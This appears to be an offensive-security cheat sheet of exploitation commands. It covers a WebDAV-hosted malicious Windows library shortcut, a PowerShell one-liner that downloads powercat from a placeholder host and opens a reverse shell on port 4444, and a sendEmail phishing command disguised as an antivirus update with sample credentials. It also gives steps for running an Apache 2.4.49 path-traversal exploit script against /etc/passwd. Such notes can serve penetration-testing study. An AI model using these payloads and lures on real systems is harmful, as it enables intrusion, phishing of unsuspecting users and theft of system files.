Exploitation
Malicious Shortcut via Powercat¶
create a shortcut on desktop: Host on WebDAV
/home/c4/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/c4/pwnshare/tools
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://IP</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://IP/powercat.ps1');
powercat -c IP -p 4444 -e powershell"
Sending Malicious Email¶
sendEmail -t user@email.com -f c4@malicious.com -u ATTENTION: Antivirus Update -a /home/c4/pwnshare/tools/config.Library-ms -s IP -m "double click file to update antivirus" -xu admin@mail.com -xp P@55w0rd
Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)¶
cp ~/pwnshare/tools/50382.sh .
chmod +x 50382.sh
setup targets.txt
EXAMPLE:
./50382.sh 245 /etc/passwd
SSH Key Cracking¶
Prep the hash for john:
Using the Password list.